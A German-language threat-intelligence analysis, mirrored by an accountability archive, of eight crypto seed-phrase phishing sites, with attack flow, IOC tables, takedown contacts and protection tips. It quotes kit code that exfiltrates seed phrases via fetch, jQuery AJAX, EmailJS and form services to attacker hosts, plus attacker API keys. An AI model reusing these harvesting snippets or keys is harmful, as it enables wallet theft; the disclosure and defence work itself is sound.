Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / DE / PHISHING ANATOMY

8 Methoden zum Stehlen von Seed-Phrasen rückentwickelt

The Enablers Registry·Editorial mirror·/de/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Anatomie des Krypto-Phishings:
8 echte Angriffe unter der Lupe

Wir haben Live-Possibly phishing-Datenverkehr abgefangen, fünf Seed-Phrase-Stealer rückentwickelt und gestohlene Daten zu [REDACTED]-Bots, EmailJS-Konten und „Possibly phishing-as-a-Service“-Backends zurückverfolgt.

27. März 2026 THE ENABLERS REGISTRY-Forschung 18 Minuten Lesezeit
Analyse einer Untersuchung zu Krypto-Phishing
Die Live-Analyse des abgefangenen Possibly phishing-Datenverkehrs deckt die gesamte Angriffsinfrastruktur auf
8Analysierte Websites
7Exfiltrationsmethoden
1,824+Gestohlene Zugangsdaten
380+Geldbörsenmarken
$0Kosten des Angreifers

Was wir herausgefunden haben

Jeden Tag verlieren Tausende von Kryptowährungsnutzern ihr Geld an Possibly phishing-Seiten, die von seriösen Wallet-Diensten nicht zu unterscheiden sind. Aber was passiert dann? hinter Die gefälschte Schaltfläche „Connect Wallet“? Wohin geht deine Seed-Phrase eigentlich?

Wir haben den Live-HTTP-Datenverkehr von fünf aktiven Possibly phishing-Websites abgefangen, deren vollständigen Quellcode heruntergeladen und jeden Endpunkt der Datenexfiltration bis zu seinem endgültigen Ziel zurückverfolgt. Diese Untersuchung deckt die gesamte Funktionsweise des modernen Krypto-Phishings auf – von den Social-Engineering-Tricks, die Sie dazu bringen, Ihre Seed-Phrase einzugeben, bis hin zum [REDACTED]-Bot, der diese in Echtzeit an den Angreifer übermittelt.

Haftungsausschluss

Alle in diesem Artikel aufgeführten Seed-Phrasen sind zufällig generierte Testdaten. Bei dieser Untersuchung wurden keine echten Zugangsdaten kompromittiert. Alle Websites wurden ihren jeweiligen Hosting-Anbietern und den für Missbrauchsfälle zuständigen Stellen gemeldet.

Das universelle Angriffsmuster

Trotz unterschiedlicher Markenbezeichnungen und Backends folgen alle 8 Possibly phishing-Seiten dem genau derselbe psychologische Trichter:

LandingpageVertrauensbildung
Geldbörsen-Auswahl60–110+ Logos
Falsche Meldung „Wird verbunden...“3–5-Sekunden-Timer
„Verbindung fehlgeschlagen“Schlägt immer fehl
Manuelle EingabeSeed / Schlüssel / Keystore
ExfiltrationTG / E-Mail / API

Die entscheidende Erkenntnis: Die Animation „Wird verbunden…“ ist immer so programmiert, dass es fehlschlägt. Im Quellcode von Website Nr. 4 haben wir Folgendes gefunden: const success = false — Es wird kein Versuch unternommen, eine Verbindung zur Wallet herzustellen. Der gesamte Ablauf dient ausschließlich dazu, die Opfer zum Formular „Manuell verbinden“ zu leiten.

Sechsstufige Kette eines Krypto-Phishing-Angriffs
Die universelle 6-stufige Angriffskette, die allen von uns analysierten Possibly phishing-Websites gemeinsam ist

Die 8 Standorte: Eine vollständige Übersicht

1
Protokoll der Netzwerkschicht
[REDACTED]
LiveIANA #1910 Pages[REDACTED]-Bot + EmailJS

Identitätsbetrug

Ein fiktives „dezentrales Protokoll“ zur Wallet-Validierung. Verwendet Live-Kursticker von CryptoCompare und Links zu echten Blockchain-Explorern (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano), um Glaubwürdigkeit zu vermitteln. Die Landingpage zeigt über 100 Wallet-Logos und einen dreistufigen „Validierungsprozess“.

Die doppelte Exfiltrationskette

Das ausgefeilteste Backend aller fünf – jede gestohlene Anmeldedaten wird über zwei unabhängige Kanäle gleichzeitig:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

OSINT-Ergebnisse

IndikatorWert
Betrüger-E-MailBestgrace309@gmail.com
[REDACTED]-Bot@DewdropsTG_bot (ID: 7567323692)
[REDACTED]-Empfänger@metatech2 (Chat-ID: 7350941887)
Backend[REDACTED]
EmailJS-Dienstservice_d5qigxs / template_7bqxeaa
Versteckte Domänelayerschain.in (aus der CF-E-Mail-Verschleierung)
Gesendete Nachrichten1.824+ (aus der [REDACTED]-Nachrichten-ID)
Domain-Alter2 Tage (TLS: 25. März 2026)
Verstoß gegen die OPSEC-Vorschriften

Die E-Mail-Adresse des Angreifers wurde in einer JavaScript-Kommentar innen config.js: // Bestgrace309@gmail.com. Sie haben vergessen, es vor der Bereitstellung zu entfernen. Zudem ist das [REDACTED]-Relay-Backend völlig offen – keine Authentifizierung, keine Ratenbegrenzung. Durch das Dekodieren von IANA #1910 data-cfemail Neben der Verschleierung im HTML-Code haben wir auch eine versteckte E-Mail-Adresse entdeckt: support@layerschain.in, mit Anbindung an Hosting-Infrastrukturen in Indien und Südafrika.

2
AQLA-Token-Migration
[REDACTED]
LiveIANA #1910 PagesNicht-statische Formulare

Identitätsbetrug

Eine pixelgenaue Nachbildung der Realität Aqualibre (AQLA) Seite zur Token-Migration. Der HTML-Code enthält ein Metadaten-Tag, das die Quelle angibt: data-scrapbook-source="https://token.[REDACTED]/migration", datiert auf den 19. November 2024.

Der Zero-Code-Ansatz

Für diesen Angriff sind folgende Voraussetzungen erforderlich: kein serverseitiger Code. Das Formular sendet die Daten direkt an Nicht statisch — ein legitimes Formular-Backend für statische Websites. Jede Eingabe wird an die E-Mail-Adresse des Betrügers weitergeleitet. Die E-Mail-Adresse des Angreifers lautet im Quellcode nie sichtbar.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Kosten: 0 $

IANA #1910 Pages: kostenlos. Un-static Forms: kostenlos. Keine Domains gekauft. Keine Server gemietet. Gesamtkosten für die Infrastruktur: null Dollar.

3
[REDACTED] Typosquat
[REDACTED]
Live IANA #1910 Pages Nicht-statische Formulare

Identitätsbetrug

Die Subdomain enthält „safpal" — eine absichtliche falsche Schreibweise von [REDACTED], eine beliebte Hardware-Wallet. Die Website gibt sich als „Blockchain Wallet Rectification“ aus und enthält 26 gefälschte Themenkategorien. Sie nutzt Typed.js, um die Namen der Blockchains (Ethereum, BSC, Polygon…) zu animieren, sowie einen LiveCoinWatch-Ticker, um Glaubwürdigkeit zu vermitteln.

Gleiche Ausrüstung, gleicher Bediener?

Verwendet das genau dieselbe Possibly phishing-Vorlage wie Standort Nr. 2: identisch connect.html, identisch wallets.html mit über 60 Logos, demselben Un-static-Backend (unterschiedliche Formular-IDs — 6f1b82c3...da9943af). Die identische Ausstattung lässt stark vermuten, dass ein Betreiber, der beide Standorte betreibt.

Fehler im Code: „Privay Policy“ (es fehlt ein „c“), „seperated“ (muss „separated“ heißen), „Kestore“ (es fehlt ein „y“). Das Passwortfeld verwendet type="text" anstatt type="password".

4
Flare-Network-Klon
[REDACTED]
LiveIANA #1910 PagesDoppelte E-MailJS-Instanz (Redundanz)

Identitätsbetrug

Ein nahezu perfekter Nachbau des Flare-Netzwerk Portal – eine echte Layer-1-EVM-Blockchain mit den Protokollen FTSO und Data Connector. Repliziert über 30 Ökosystempartner, die Navigation und das Branding. Favicons werden von einer Typosquat-Domain geladen: [REDACTED] (ein „n“ fehlt in „mainnet“).

Doppelte Redundanz bei EmailJS

Die einzige Website, die zwei separate EmailJS-Konten gleichzeitig zur Redundanz gegen eine Abschaltung:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

E-Mail-Betreff bei jedem Diebstahl: "New Wallet Details from Flare".

Dies ist ein finanziertes Unternehmen

Der HTML-Code enthält Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC-Schutz, und ein Twitter/X-Anzeigen-Pixel. Der Angreifer führt Folgendes aus: bezahlte Werbung um Opfer auf die Possibly phishing-Seite zu leiten und Bot-Klicks herauszufiltern. Das ist kein Hobby – es handelt sich um eine finanzierte Operation mit Analysetools und Werbeausgaben.

Phishing-Seite des Flare-Netzwerks mit EmailJS und bezahlter Werbung
Website Nr. 4: Bezahlte Anzeigen, Analyse-Tracking und doppelte Datenexfiltration – die professionellste Operation
5
COIN NODE / Wallet-Korrektur (PhaaS)
[REDACTED]
Backend ausgefallenPulseResolve-API (PhaaS)

Identitätsbetrug

Ein generischer „COIN NODE“-/„Wallet Fix“-Dienst (keine bestimmte Marke). Copyright „Wallet Fix 2022“ – diese Kit-Vorlage ist mindestens 4 Jahre alt. Bilder gehostet auf [REDACTED] (WordPress auf AWS).

Possibly phishing-as-a-Service

Die beunruhigendste Backend-Architektur: eine UUID-basierte Multi-Tenant-API:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

Jeder Betrüger erhält einen eigenen UUID-Endpunkt. Ein zentraler Betreiber verwaltet die API, verfolgt die Kampagnen und behält möglicherweise einen Anteil der gestohlenen Gelder ein. Dies ist industrialisierter Kryptodiebstahl — ein „Possibly phishing-as-a-Service“-Modell.

Zugehörige Infrastruktur (größtenteils stillgelegt)

DomäneRolleStatus
[REDACTED]Exfiltrations-APINXDOMAIN
[REDACTED]Favicon-HostNXDOMAIN
[REDACTED]Logo-HostNXDOMAIN
[REDACTED]Bild-CDNLive (AWS)
Zombie-Frontend

Das Backend ist ausgefallen, aber das Das Frontend ist weiterhin in Betrieb auf IANA #1910 Pages. Wenn der Angreifer die Domain erneut registriert [REDACTED], ist die Website sofort wieder betriebsbereit.

6
Support-Center + Wiederherstellung des Hauptbuchs
[REDACTED] & [REDACTED]-recovery.support
LiveIANA #1910 Pages + ReplitBenutzerdefinierte C2-APIBIP39-Autovervollständigung

Identitätsbetrug

A zweigleisige Vorgehensweise: ein allgemeines „Support-Center“ unter [REDACTED] mit 15 fiktiven Ausgabenkategorien und 39 Geldbörsenmarken sowie einer Pixelgenauer Klon des [REDACTED]-Onboarding-Prozesses bei [REDACTED]-recovery.support auf Replit gehostet – komplett mit Auswahl des Gerätemodells, PIN-Einrichtung und einem Raster für die 24-Wort-Seed-Phrase mit Echte BIP39-Autovervollständigung.

Anti-Scanner-C2-Backend

Die Support-Seite der Wallet sendet gestohlene Daten an [REDACTED]/log — ein maßgeschneiderter nginx/Ubuntu-C2-Server hinter IANA #1910. Das Backend verwirft absichtlich alle GET-Anfragen (gibt den Fehlercode 522 „Timeout“ zurück) und reagiert nur auf POST-Anfragen. Das bedeutet, dass URL-Scanner, Crawler von Google Safe Browsing und Sicherheitsforscher, die den Endpunkt mit GET-Anfragen anpingen, nichts sehen – der C2-Server scheint nicht erreichbar zu sein.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Der [REDACTED]-Klon führt ein separates Express.js-Backend direkt auf Replit aus: POST /api/recovery-phrase Sammeln {deviceId, pin, phrase}. Es gibt Folgendes zurück 400 {"error":"Invalid data provided"} bei fehlerhaften Eingaben — um sicherzustellen, dass das Backend live und aktiv validiert gestohlene Daten.

OSINT-Ergebnisse

IndikatorWert
Frontend (Wallet)[REDACTED]
Frontend ([REDACTED])[REDACTED]-recovery.support (34.111.179.208)
C2-Backend [REDACTED] → nginx/1.24.0 Ubuntu
C2-IPs104.21.60.163 / 172.67.198.35 (IANA #1910)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
Registrar[REDACTED] ([REDACTED]-recovery.support)
Eingesetzt9. Januar 2026 (Header „Last-Modified“)
Technologiestack React + Vite + Tailwind v4.1 + Framer Motion
Höchste UX-Genauigkeit

Das 466 KB große JS-Bundle enthält die vollständige BIP39-Wortliste Bei der Echtzeit-Autovervollständigung wurden 67 Verweise auf „Passphrase“ und 39 auf „Mnemonic“ gefunden. Der [REDACTED]-Klon führt die Opfer durch genau denselben Einrichtungsablauf wie ein echtes [REDACTED]-Gerät – die überzeugendste Possibly phishing-Seite in dieser gesamten Untersuchung. Die apiKey Das Feld in der Konfiguration schlägt eine Multi-Tenant-PaaS-Architektur.

7
Dezentrales Launchpad
[REDACTED]
LiveIANA #1910 PagesFormSubmit.co

Identitätsbetrug

Ein generisches „dezentrales Launchpad“ mit 21 Köderkategorien (Staking, Migration, KYC, Gewinnspiel, Belohnungen einlösen, Wiederherstellung von Vermögenswerten, Vorverkauf, NFTs prägen, gesperrte Konten...) und Über 70 Geldbörsenmarken — eine der umfassendsten Wallet-Listen, die uns begegnet sind. Der verräterische Tippfehler „Sychronize“ (das fehlende „n“) entlarvt die Fälschung.

Die FormSubmit-Pipeline

Verwendungszwecke FormSubmit.co — ein seriöser Formular-zu-E-Mail-Dienst. Der Endpunkt-Hash a2cf4131f1a5d39453c7c183df96f86f ist ein MD5-Hash der E-Mail-Adresse des Betrügers. Wir haben Hunderte von E-Mail-Mustern bei Gmail, Yahoo, Hotmail, ProtonMail, Yandex und [REDACTED] per Brute-Force-Angriff durchprobiert — kein Treffer. Der Betrüger verwendet eine ungewöhnliche oder zufällig generierte E-Mail-Adresse.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

OSINT-Ergebnisse

IndikatorWert
Domäne[REDACTED]
Formular-Absendungs-Hasha2cf4131f1a5d39453c7c183df96f86f
Kampagnen-IDDAPP DEZENTRALISIERT
FontAwesome-Kitbdc3291137 (Bausatz Nr. 112310842, kostenlos, Version 6.7.2)
jQuery3.2.1 + 3.5.1 gleichzeitig geladen
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (Inkompatibilität)
Zwei Tragegriffe

FontAwesome-Kit bdc3291137 — FontAwesome kann den Kontoinhaber hinter dieser Kit-ID identifizieren. Das Kampagnen-Tag DAPP DECENTRALIZED könnte auf anderen Possibly phishing-Seiten erscheinen, die denselben FormSubmit-Hash verwenden. Nach dem Diebstahl der Seed-Phrase kann ein gefälschter QR-Code und zufälliger 7-stelliger Referenzcode Es wird folgende Meldung angezeigt: „Wenden Sie sich mit Ihrem individuellen Referenzcode an den Administrator“ – wodurch die Opfer warten müssen, anstatt dass Ermittlungen eingeleitet werden.

8
R2 Bucket + PHP auf dem Heimcomputer
pub-519769e9eb634616b1746c2018641d56.r2.dev
TotIANA #1910 R2PHP + DDNS

Identitätsbetrug

Unbekannt – sowohl das Frontend als auch das Backend sind offline. Der Struktur der Nutzlast nach zu urteilen handelte es sich um einen Stealer für die Seed-Phrase einer Krypto-Wallet. Der Öffentlicher IANA #1910-R2-Bucket (Objektspeicher, nicht Pages) ist ein gut dokumentierter Possibly phishing-Vektor mit über 5.000 identifizierten schädlichen Seiten und einem von Netskope gemeldeten 61-fachen Anstieg des Datenverkehrs.

Die „Script-Kiddie“-Konfiguration

Am meisten primitive Operation in dieser Sammlung. Die Seed-Phrasen werden gesendet Wort für Wort zu einem PHP-Skript, das auf einem Heimcomputer oder einem VPS hinter einem kostenlosen dynamischen DNS läuft:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

OSINT-Ergebnisse

IndikatorWert
Frontend pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE]
Backend [REDACTED] [NXDOMAIN]
R2-Eimer-ID519769e9eb634616b1746c2018641d56
DDNS-Anbieter [REDACTED] / [REDACTED] (Cincinnati, Ohio)
DNS NSns10–[REDACTED]
Benutzernamemercifuljigga4real123
OSINT-Benutzername: mercifuljigga4real123

„Merciful“ + „jigga“ (Jay-Zs Spitzname) + „4real“ + „123“ – ein ganz und gar persönlicher Nutzername, der auf eine Verbundenheit mit der Hip-Hop-Kultur hindeutet. Nicht gefunden auf jeder indexierten Plattform: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch oder [REDACTED]. Wahrscheinlich unter diesem Namen oder ähnlichen Varianten auf [REDACTED], [REDACTED] oder Gaming-Plattformen aktiv. Der Dateiname fuc.php passt zum frechen Stil des Griffs.

7 Methoden, wie Ihre Seed-Phrase gestohlen werden kann

Vier Methoden zum Datendiebstahl durch Krypto-Phishing im Vergleich
Sieben verschiedene Exfiltrationsarchitekturen, die auf den acht Possibly phishing-Websites zum Einsatz kamen
VerfahrenStandorteSo funktioniert esGeschwindigkeitKosten
[REDACTED]-Bot#1 Express.js auf [REDACTED] leitet Anfragen an die Bot-API weiter. Der Betrüger erhält umgehend eine Direktnachricht mit den Zugangsdaten. Echtzeit$0
EmailJS#1, #4 Clientseitiges JavaScript sendet die Daten direkt an die EmailJS-API, die sie an die E-Mail-Adresse des Betrügers weiterleitet. ~1 Min.$0
Nicht-statische Formulare#2, #3 Standardmäßiges HTML-Formular (POST) an einen legitimen Formular-Dienst, der die übermittelten Daten per E-Mail weiterleitet. ~1 Min.$0
FormSubmit.co#7 jQuery-AJAX an FormSubmit.co. E-Mail-Adresse hinter einem MD5-Hash verborgen. Kampagne mit dem Tag „DAPP DECENTRALIZED“ versehen. ~1 Min.$0
Benutzerdefinierte C2-API#6 [REDACTED] leitet Anfragen an die Nginx/Express-API hinter IANA #1910 weiter. Lässt GET-Anfragen fallen (522) um Scanner zu umgehen. Reagiert nur auf POST. Echtzeit~5 $/Monat
PHP + DDNS#8 PHP-Skript auf einem Heimcomputer über einen kostenlosen Dynamic-DNS-Dienst ([REDACTED]). Die Seed-Phrase wird Wort für Wort gesendet. Echtzeit$0
PhaaS-API#5 UUID-basierte Multi-Tenant-API. Ein zentraler Betreiber verwaltet das Backend, Betrüger mieten Endpunkte. EchtzeitUnbekannt

7 Warnzeichen, die jede Possibly phishing-Seite entlarven

Wenn du siehst, dass irgendein In diesen Fällen schließen Sie die Registerkarte sofort:

1. „Verbindung fehlgeschlagen“ ist immer eine Falschmeldung

Echte Wallet-Verbindungen nutzen das WalletConnect-Protokoll oder Browser-Erweiterungen. Bei ihnen wird niemals die Fehlermeldung „Verbindung fehlgeschlagen“ angezeigt, bei der Sie aufgefordert werden, Ihre Seed-Phrase einzugeben.

2. 50–110+ Wallet-Logos, ein Zielort

Jedes Wallet-Symbol führt zum gleichen Formular. Ein echter Dienst würde das jeweilige SDK der einzelnen Wallets integrieren.

3. „Fehler“ nach dem Absenden

Der gefälschte „503-Fehler“ oder „Unbekannter Fehler“ nach dem Absenden ist beabsichtigt. Ihre Daten wurden bereits gestohlen – der Fehler soll Sie dazu verleiten, es mit einer anderen Wallet erneut zu versuchen.

4. Gehostet auf .pages.dev

Alle 5 Websites nutzen die kostenlose Version von IANA #1910 Pages missbräuchlich. Eine Identitätsprüfung ist nicht erforderlich. Der Missbrauch von IANA #1910 Pages für Possibly phishing-Angriffe stieg im Jahr 2025 um 198 % an.

5. Drei Registerkarten: Phrase / Privater Schlüssel / Keystore

Kein seriöser Dienst benötigt alle drei Arten von Anmeldedaten. Dieses Formular mit drei Registerkarten ist ein typisches Merkmal eines Possibly phishing-Kits.

6. Keine Interaktion mit der Blockchain

Keine dieser Seiten wird geladen ethers.js, web3.jsoder RPC-Aufrufe ausführen. Es handelt sich um reine HTML-Formulare, die vorgeben, dApps zu sein.

7. Infrastruktur ohne Kosten

Kostenloses Hosting + kostenlose Formular-Dienste + kostenlose Nachrichtenfunktion = eine komplette Possibly phishing-Aktion für 0 $. Wenn die Website keine echte Domain hat, sollten Sie misstrauisch sein.

Vollständige IOC-Tabelle

Für Sicherheitsteams, Threat-Intelligence-Plattformen und Personen, die Missbrauch melden:

Domains und Infrastruktur

DomäneTypStatus
[REDACTED]Possibly phishing-FrontendLive
[REDACTED]Possibly phishing-FrontendLive
[REDACTED]Possibly phishing-FrontendLive
[REDACTED]Possibly phishing-FrontendLive
[REDACTED]Possibly phishing-FrontendLive
[REDACTED]TG-Relais-BackendLive
[REDACTED]Typosquat-AssetsUnbekannt
layerschain.inVerwandte DomäneDNS ausgefallen
[REDACTED]PhaaS-BackendNXDOMAIN
[REDACTED]Asset-HostNXDOMAIN
[REDACTED]Logo-HostNXDOMAIN
[REDACTED]Bild-CDNLive (AWS)
[REDACTED]Possibly phishing-FrontendLive
[REDACTED]-recovery.support[REDACTED]-Possibly phishing (Replit)Live
[REDACTED]C2-Backend (nginx/Ubuntu)Live
[REDACTED]Stammdomäne404
[REDACTED]Possibly phishing-FrontendLive
pub-519769e9eb634616b1746c2018641d56.r2.devPossibly phishing (R2-Bucket)Offline
[REDACTED]PHP-Backend (DDNS)NXDOMAIN

Konten und Kennungen

TypWertStandort
E-MailBestgrace309@gmail.com#1
E-Mail (verborgen)support@layerschain.in#1
[REDACTED]-Bot@DewdropsTG_bot (7567323692)#1
[REDACTED]-Nutzer@metatech2 (7350941887)#1
EmailJS Nr. 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS Nr. 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Nicht-statische Formc78173e2d991...94c3f76#2
Nicht-statische Form6f1b82c3ce55...da9943af#3
PhaaS-UUIDa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Render-Instanzrndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
Formularübermittlung MD5a2cf4131f1a5d39453c7c183df96f86f#7
Kampagnen-TagDAPP DEZENTRALISIERT#7
FontAwesome-Kitbdc3291137 (Bausatz Nr. 112310842)#7
R2-Eimer-ID519769e9eb634616b1746c2018641d56#8
Benutzername/DDNSmercifuljigga4real123#8

Wo kann man Krypto-Possibly phishing melden?

Wo man Krypto-Phishing-Seiten melden kann – Abschaltungen über mehrere Kanäle
Gleichzeitige Ausrichtung auf Hosting, Backend-Dienste und Messaging-Plattformen für maximale Geschwindigkeit bei den Abschaltungen
ServiceWas ist zu melden?Wie
IANA #19107x .pages.dev + 1x R2-Bucketabuse.IANA #1910.com
Google Safe BrowsingAlle Possibly phishing-URLsPossibly phishing melden
PhishTankAlle URLs für die Community-Blockliste[REDACTED]
EmailJS3 missbrauchte Konten (Service-IDs siehe oben)abuse@emailjs.com
Nicht statisch2 Endpunkte des FormularsKontakt über [REDACTED]
[REDACTED][REDACTED]-Relay-BackendFormular zur Meldung von Missbrauch anzeigen
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
Google (Gmail)Bestgrace309@gmail.comGoogle-Missbrauch melden
Twitter/XAnzeigenkonto zur Bewerbung von Website Nr. 4Missbrauch bei X-Anzeigen melden
FormSubmit.coHash a2cf4131... (#7)Formular zum Melden von Missbrauch absenden
Replit[REDACTED]-recovery.support (#6)Missbrauch bei Replit melden
[REDACTED]Registrar für [REDACTED]-recovery.supportMissbrauch bei [REDACTED]
DNSExit[REDACTED][REDACTED] – Missbrauch
FontAwesomeBausatz bdc3291137 (#7)Missbrauch von FontAwesome
ChainabuseAlle Possibly phishing-Kampagnen[REDACTED]

So schützen Sie sich

Die Goldene Regel

Kein seriöser Dienst wird Sie jemals auffordern, Ihre Seed-Phrase auf einer Website einzugeben. Seed-Phrasen werden ausschließlich bei der Wiederherstellung der Wallet in die offizielle Wallet-Software eingegeben – niemals auf Websites von Drittanbietern, die „Validierung“, „Synchronisierung“ oder „Wiederherstellung“ anbieten.

Bevor Sie eine Wallet verbinden:

  • Stellen Sie sicher, dass die URL mit der offiziellen Domain übereinstimmt. Überprüfen Sie die Angaben zum SSL-Zertifikat.
  • Real WalletConnect verwendet einen QR-Code oder einen Deep Link – niemals ein Seed-Phrase-Formular.
  • Wenn die „Verbindung fehlschlägt“ und Sie aufgefordert werden, Ihre Zugangsdaten manuell einzugeben – dann handelt es sich um Possibly phishing.
  • Überprüfen Sie verdächtige URLs unter PhishTank oder VirusTotal bevor man mit jemandem in Kontakt tritt.
  • Verwenden Sie eine Hardware-Wallet – diese erfordert bei jeder Transaktion eine physische Bestätigung.
  • Speichern Sie offizielle URLs als Lesezeichen. Klicken Sie niemals auf Links in Anzeigen, Direktnachrichten oder sozialen Medien.

Die Taxonomie des Krypto-Phishings

Seed-Phrase-Diebe sind nur eine Kategorie. Hier ist ein Überblick über das gesamte Spektrum des Krypto-Phishings – wir werden zu jeder Art ausführliche Einblicke hinzufügen.

Seed-Phrase-Diebe
Gefälschte „Connect Wallet“-Seiten, die Sie dazu verleiten, Ihre Wiederherstellungsphrase einzugeben. Der Schwerpunkt dieses Artikels: 5 echte Beispiele unter der Lupe.
Oben behandelt
Zustimmungsentführung
Bösartige dApps, die über [REDACTED] die Genehmigung für eine unbegrenzte Anzahl von Token anfordern. Sobald die Genehmigung erteilt ist, leert der Angreifer Ihr Wallet, ohne dass er Ihre Seed-Phrase benötigt.
Demnächst
Ice Possibly phishing (Permit2)
Nutzt die gasfreien Berechtigungen von EIP-2612 aus. Das Opfer unterzeichnet eine Off-Chain-Nachricht, die Rechte zur Übertragung von Token gewährt – bis zum Abzug ist keine On-Chain-Genehmigung sichtbar.
Demnächst
Gefälschte Airdrop-Behauptungen
Gefälschte Token-Airdrops, bei denen die „Einlösung“ über einen bösartigen Smart Contract erfolgen muss. Bei der Einlösungstransaktion werden Ihre echten Token tatsächlich abgezogen.
Demnächst
Zwischenablage-Hijacker
Malware, die Ihre Zwischenablage überwacht und kopierte Wallet-Adressen unbemerkt durch die Adresse des Angreifers ersetzt, bevor Sie sie einfügen.
Demnächst
Staubbildung + Vergiftung
Kleine Transaktionen von Adressen, die anderen ähneln, verunreinigen Ihren Transaktionsverlauf. Das Opfer kopiert die gefälschte Adresse aus dem Transaktionsverlauf für seine nächste Überweisung.
Demnächst

Die unbequeme Wahrheit

Die Kosten für die Einrichtung einer Krypto-Possibly phishing-Aktion betragen $0 und dauert unter 30 Minuten. Kostenloses Hosting, kostenlose Formular-Dienste, kostenlose Messaging-Bots. Der Angreifer hinter Website Nr. 1 hat bereits Anmeldedaten von 1.824+ Opfer. Standort Nr. 4 ist in Betrieb bezahlte Werbung in großem Maßstab. Das ist kein Amateurkram – das ist eine ganze Branche. Die einzige Verteidigung ist Aufklärung.

Helft uns, uns zu wehren

THE ENABLERS REGISTRY spürt Krypto-Possibly phishing-Seiten in Echtzeit auf und meldet sie. Wenn Sie auf eine verdächtige Seite gestoßen sind, melden Sie sie uns – wir werden der Sache nachgehen und uns dafür einsetzen, dass sie offline genommen wird.

Verwandte Ermittlungen

Untersuchung
Das Ende von [REDACTED]: IANA #1479 hat gelogen, um einen M-Dieb zu schützen
10 Jahre Monero-Diebstahl. 3 Registrare waren daran beteiligt. IANA #1479 hat 7 Lügen erfunden.
Ein tiefer Einblick
Krypto-Drainer-Netzwerke: Infrastruktur aufgedeckt
Wie „Drainer-as-a-Service“-Betriebe Infrastruktur und Bedienpersonal gemeinsam nutzen.
Füllung freigelegt
[REDACTED] Possibly phishing-Panel: Vollständiger Administratorzugriff
Wir haben uns Zugang zum Admin-Bereich einer Trust-Wallet-Possibly phishing-Aktion verschafft.
Infrastruktur
Betrugsinfrastruktur aufgedeckt: Gemeinsame Backends
Wie Betrüger Server, Vorlagen und Zahlungsabläufe gemeinsam nutzen.

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings